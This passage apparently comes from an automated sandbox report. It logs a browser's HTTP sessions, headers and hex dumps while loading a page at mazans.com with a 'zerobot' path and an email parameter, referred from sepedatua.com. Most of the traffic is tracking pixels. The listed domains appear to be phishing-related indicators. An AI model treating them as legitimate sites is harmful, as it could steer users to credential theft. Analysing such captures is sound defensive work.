                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 12387,"ttlInHour":1,"rtcPortNumbers":[12580,12581,12582,12583,12584,12585],"enableWebRTC":false});fbq.loadPlugin("actionid");instance.optIn("1040773425961662", "ActionID", true);config.set("1040773425961662", "gating", {"gatings":[{"name":"content_type


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          115192.168.2.1749947157.240.0.354436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC714OUTGET /privacy_sandbox/pixel/register/trigger/?id=731950963606637&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515356384&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&it=1731515354065&coo=false&rqm=FGET HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.facebook.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7436801840012250375", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7436801840012250375"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC1834INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27 77 61 73 6d 2d 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 67 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com *.facebook.com *.fbcdn.net;script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net 'wasm-unsafe-eval' https://*.go
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC1706INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          116192.168.2.17499433.248.162.964436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:19 UTC403OUTGET /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC268INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: undefined
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:19 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          117192.168.2.174995291.228.74.2004436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC1053OUTGET /pixel;r=914973261;labels=_fp.event.Page%20not%20found%20%7C%20SendGrid;rf=0;a=p-de_F6qVUp9bug;url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED;ref=https%3A%2F%2Fsepedatua.com%2F;ns=0;ce=1;qjs=1;qv=6cdb9339-20241109062824;dst=1;et=1731515356482;tzo=300;ogl=type.website%2Csite_name.SendGrid%2Curl.https%3A%2F%2Fsendgrid%252Ecom%2Fen-us%2F404%2Ctitle.Page%20not%20found%20%7C%20SendGrid%20%2Cdescription.%2Cimage.https%3A%2F%2Fsendgrid%252Ecom%2Fcontent%2Fdam%2Fsendgrid%2Fcore-assets%2Fsocial%2Fsendgrid-default-og;ses=866c6b77-1f69-4857-b1ec-19e8d7f84073;d=mazans.com;uht=2;fpan=1;fpa=P0-2005580295-1731515356484;pbc=;gdpr=0;mdl= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pixel.quantserve.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: mc=6734d3de-eac9d-cb333-2df9d
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC520INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:20 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 35
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Attribution-Reporting-Register-Trigger: {"event_trigger_data":[{"filters":[{"label":["ZERLQY0Zh2Z5pAevlPis0A=="],"pcode":["p-de_F6qVUp9bug"]}],"trigger_data":"1"}]}
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, no-store, proxy-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 04 Aug 1978 12:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=86400
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC35INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 80 ff ff ff 00 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          118192.168.2.17499493.248.162.964436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC2107OUTGET /tracker/tc_imp.gif?e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46a56a82b9eec47679c796e092818c5871d61eb72bffeb1ba131be20ecca7478c31db6bda508e1547f77303fd1f564c2acf503ed79ffca8328828bf7d8557ec4b7274a7d43169230121e118f58109ac5d6ead83c6771e217dcf965d78c9df014b3545700015a7902c7e7d17c7ab1f28cef2ea2b93e745711b3eb7b4e7c1d965b4cfd908e2529d516b3098e89ae6a231c3daea6dc1345ad0f0c8241f14fe3467a0910678fc86ae668504f745b7980a870d97dd75d66071d2d964d27a8f8fb9b9deb1a00779a972a9dc8f5b4c4dc8ce6596b340bb414f07df5a5387d4ced0c6ec8830c53c9dc3b2877be5722413ab5b00baa9a16901f3c9458c27a7dd0d9070ef25110514dc31bc1cd1cbee27ebd56a964ea9cfdd9b3fce6e752db31e1413261a3087bb60f41d8282c734a29a62ed802bcac2b1be7799a6f54e3e33c5f85956dcb10a4c15f7a0e339f92588f64ebcb83cb86ec364cb07a3568efc2edb0879b5e8cb316e7b395c74195605f4f3907e8553c419171677bc [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC230INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 43
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:20 GMT
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 db df ef 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          119192.168.2.174994854.75.69.1924436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC669OUTPOST /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1866
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC1866OUTData Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 66 63 32 33 34 65 66 34 34 38 66 39 38 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 33 38 34 36 62 32 30 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 38 38 35 38 35 38 65 30 35 32 61 33 61 31 65 61 64 32 62 37 36 30 64 64 34 36 65 64 64 36 33 63 36 30 36 33 34 30 36 32 61 39 36 35 61 35 33 35 63 33 32 30 34 35 62 63 30 62 63 36 62 34 66 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 32 33 63 66 33 34 63 36 64 61 39 30 39 33 33 37 38 31 34 64 61 34 64 65 34 34 34 65 63 38 62 63 35 39 61 37 65 65 34 36
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:20 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          120192.168.2.1749954172.217.18.44436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:20 UTC1249OUTGET /pagead/1p-user-list/923239173/?random=1731515353497&cv=11&fst=1731513600000&bg=ffffff&guid=ON&async=1&gtm=45be4b70v875390547z89126943770za201zb9126943770&gcd=13t3t3t3t5l1&dma=0&tag_exp=101823848~101925629~102067554~102077854&u_w=1280&u_h=1024&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&ref=https%3A%2F%2Fsepedatua.com%2F&hn=www.googleadservices.com&frm=0&tiba=Page%20not%20found%20%7C%20SendGrid&did=dNTIxZG&gdid=dNTIxZG&npa=0&pscdl=noapi&auid=1581689275.1731515350&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwCa7L7d_FlbTcxAkA3WYiine-jPApibz-O4Xg&random=4124225919&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlaHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:20 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Server: cafe
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          121192.168.2.1749957157.240.0.354436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC695OUTGET /tr/?id=1040773425961662&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515357841&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&cs_est=true&it=1731515354065&coo=false&dpo=&rqm=GET HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.facebook.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC465INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin:
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                          X-FB-Connection-Quality: GOOD; q=0.7, rtt=119, rtx=0, c=10, mss=1380, tbw=3402, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:21 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          122192.168.2.1749958157.240.0.354436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC732OUTGET /privacy_sandbox/pixel/register/trigger/?id=1040773425961662&ev=PageView&dl=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&rl=https%3A%2F%2Fsepedatua.com%2F&if=false&ts=1731515357841&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.1.1731515356382.644741780521606255&ler=other&cdl=API_unavailable&cs_est=true&it=1731515354065&coo=false&dpo=&rqm=FGET HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.facebook.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:21 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7436801848212009850", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7436801848212009850"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
